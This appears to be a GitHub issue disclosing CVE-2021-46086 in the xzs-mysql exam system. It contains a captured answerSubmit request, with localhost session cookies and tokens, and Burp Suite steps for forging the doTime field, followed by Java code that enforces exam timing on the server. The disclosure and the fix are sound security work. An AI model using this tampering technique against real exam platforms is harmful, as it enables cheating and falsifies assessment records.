CVE-2021-46086: An Insecure Permissions vulnerability exists in XZS · Issue #327 · mindskip/xzs-mysql
xzs-mysql >= t3.4.0 is vulnerable to Insecure Permissions. The front end of this open source system is an online examination system. The function that submits examination papers is unsafe: an attacker can use Burp Suite to modify parameters in the request and destroy real data.
[Suggested description]
An Insecure Permissions vulnerability exists in xzs-mysql. The front end of this open source system is an online examination system. The function that submits examination papers is unsafe: an attacker can use Burp Suite to modify parameters in the request and destroy real data.
Post: /api/student/exampaper/answer/answerSubmit
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/mindskip/xzs-mysql
[Affected Product Code Base]
t3.4.0
[Affected Component]
POST /api/student/exampaper/answer/answerSubmit HTTP/1.1
Host: localhost:8000
Content-Length: 135
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: 010353a5-cfe1-4fa8-9a28-0b9cfb4ca538
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
request-ajax: true
Content-Type: application/json
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/student/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640832435; adminUserName=admin; JSESSIONID=WIBLgnVPP4rhIJU3PzYXxEwTHTA5na4PoZADiRaS; studentUserName=test002; Hm_lpvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640835202
Connection: close

{
  "questionId":null,
  "doTime":6,
  "answerItems":[
    {
      "questionId":1,
      "content":null,
      "contentArray":[
      ],
      "completed":false,
      "itemOrder":1
    }
  ],
  "id":1
}
[Attack Type]
Remote
[Impact Code execution]
false
Step 1: Open the URL http://localhost:8000/student/index.html#/paper/index and click "start answer".
The total exam time is 60 minutes. The remaining time is displayed in the upper right.
Step 2: Enable the Burp Suite proxy and click the submit button to capture the request.
The value of doTime is the number of seconds between the start of the test and clicking the submit button; it can be modified to any number.
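
One way to close this gap is to have the server record when the paper was handed out and compute the elapsed time itself, treating the client's doTime only as a value to compare. The sketch below is an added example, not code from xzs-mysql; the class ExamTimer, its methods and the 30-second grace period are assumptions made for illustration.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.function.Supplier;

// Added example with hypothetical names; not code from xzs-mysql.
public class ExamTimer {
    private static final long GRACE_SECONDS = 30; // assumed allowance for network delay
    private final Map<String, Instant> startedAt = new ConcurrentHashMap<>();
    private final Supplier<Instant> now; // injectable clock so the demo can advance time

    public ExamTimer(Supplier<Instant> now) { this.now = now; }

    // Called when the server hands the paper to the authenticated student.
    public void start(String user, int paperId) {
        startedAt.putIfAbsent(user + ":" + paperId, now.get());
    }

    // Returns the elapsed seconds to persist. The client's doTime is compared, never stored.
    public long submit(String user, int paperId, long limitSeconds, long clientDoTime) {
        Instant start = startedAt.remove(user + ":" + paperId);
        if (start == null) {
            throw new IllegalStateException("no server-side start record for this paper");
        }
        long elapsed = Duration.between(start, now.get()).getSeconds();
        if (elapsed > limitSeconds + GRACE_SECONDS) {
            throw new IllegalStateException("time limit exceeded: " + elapsed + "s");
        }
        if (Math.abs(elapsed - clientDoTime) > GRACE_SECONDS) {
            // A large gap suggests the request body was edited; write it to the audit log.
            System.err.println("doTime mismatch: client=" + clientDoTime + " server=" + elapsed);
        }
        return elapsed;
    }

    public static void main(String[] args) {
        Instant[] clock = { Instant.parse("2021-12-30T03:00:00Z") }; // constructed time
        ExamTimer timer = new ExamTimer(() -> clock[0]);
        timer.start("test002", 1);
        clock[0] = clock[0].plusSeconds(1500);       // 25 minutes pass on the server
        System.out.println(timer.submit("test002", 1, 3600, 6)); // body claimed doTime=6
        timer.start("test002", 1);
        clock[0] = clock[0].plusSeconds(4000);       // past the 60-minute limit
        try {
            timer.submit("test002", 1, 3600, 6);
        } catch (IllegalStateException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

In a real deployment the user would come from the authenticated session rather than a request field, and the start record would live in the database alongside the paper so that it survives restarts.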